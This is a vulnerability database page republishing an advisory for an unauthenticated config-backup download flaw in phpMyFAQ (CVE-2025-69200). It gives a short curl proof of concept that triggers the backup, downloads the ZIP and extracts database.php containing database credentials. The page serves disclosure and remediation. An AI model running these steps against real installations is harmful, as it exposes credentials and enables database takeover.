logo

Database

Technical information leak In thorsten/phpmyfaq

Description

phpMyFAQ has unauthenticated config backup download via /api/setup/backup

Summary

An unauthenticated remote attacker can trigger generation of a configuration backup ZIP via POST /api/setup/backup and then download the generated ZIP from a web-accessible location. The ZIP contains sensitive configuration files (e.g., database.php with database credentials), leading to high-impact information disclosure and potential follow-on compromise.

Details

The endpoint /api/setup/backup is reachable via default rewrite rules and does not enforce authentication/authorization or API token verification. When called with any non-empty body (used as an “installed version” string), the server creates a ZIP archive inside the configuration directory and returns a direct URL to the generated ZIP file.

Relevant code paths:

    Rewrite rule exposing the endpoint:

      phpmyfaq/.htaccess: RewriteRule ^api/setup/(check|backup|update-database) api/index.php [L,QSA]

    Controller implementation:

      phpmyfaq/src/phpMyFAQ/Controller/Api/SetupController.phpbackup()

        No call to hasValidToken(), userIsAuthenticated(), or any permission check

    Backup creation:

      phpmyfaq/src/phpMyFAQ/Setup/Update.phpcreateConfigBackup()

        Writes the ZIP into the config directory and returns a public URL under content/core/config/

PoC

Replace BASE_URL with your instance URL.

    Trigger config backup generation without authentication:

BASE_URL="http://localhost"
curl -i -X POST "${BASE_URL}/api/setup/backup" \
  -H "Content-Type: text/plain" \
  --data "4.1.0-RC"

Expected result: 200 OK with JSON containing backupFile.

    Copy the backupFile URL from the JSON response and download it (still without authentication):

# Example (replace with the exact URL returned in step 1)
curl -i "http://localhost/content/core/config/phpmyfaq-config-backup.YYYY-MM-DD.zip" -o phpmyfaq-config-backup.zip

    Verify sensitive content exists in the ZIP:

unzip -l phpmyfaq-config-backup.zip
unzip -p phpmyfaq-config-backup.zip database.php

Observed: database.php is included and contains DB host/user/password.

Impact

    Vulnerability class: Missing authentication/authorization for a sensitive function + sensitive information exposure.

    Who is impacted: Any internet-exposed phpMyFAQ installation where the default .htaccess rewrite rules are active and the endpoint is reachable.

    Security impact: Disclosure of configuration secrets (DB credentials, integration config, etc.), enabling follow-on attacks such as database takeover and data exfiltration.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2025-692002. NVD-2025-692003. OSV-2025-692004. GHSA-9cg9-4h4f-j6fg5. GCVE-2025-69200

References

1. https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9cg9-4h4f-j6fg2. https://github.com/thorsten/phpMyFAQ/commit/b0e99ee3695152115841cb546d8dce64ceb8c29a3. https://vulncheck.com/cve/CVE-2025-692004. https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-69200.yaml

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.